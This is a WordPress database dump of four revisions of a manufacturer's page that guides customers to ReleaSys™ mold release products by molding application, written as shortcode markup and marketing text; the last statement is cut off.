INSERT INTO `wp_posts` VALUES (4484, 2, '2017-06-07 15:59:20', '2017-06-07 15:59:20', '[button text="ADVANCED COMPOSITES"]\r\n\r\n[button text="ROTATIONAL"]\r\n\r\n[button text="POLYURETHANE"]\r\n\r\n[button text="RUBBER"]\r\n<br /><br />\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.\r\n\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Custom Formulations</h2>\r\nDidn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request\r\n\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:59:20', '2017-06-07 15:59:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4485, 2, '2017-06-07 16:39:24', '2017-06-07 16:39:24', '[button text="ADVANCED COMPOSITES" target="Row"]\n\n[button text="ROTATIONAL"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER"]\n\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:39:24', '2017-06-07 16:39:24', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4486, 2, '2017-06-07 16:49:10', '2017-06-07 16:49:10', '[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMERS"]\n\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 16:49:10', '2017-06-07 16:49:10', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4487, 2, '2017-06-07 16:49:28', '2017-06-07 16:49:28', '[button text="ADVANCED COMPOSITES"]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER - SILICONE - ELASTOMERS"]\n\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRE-CAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" 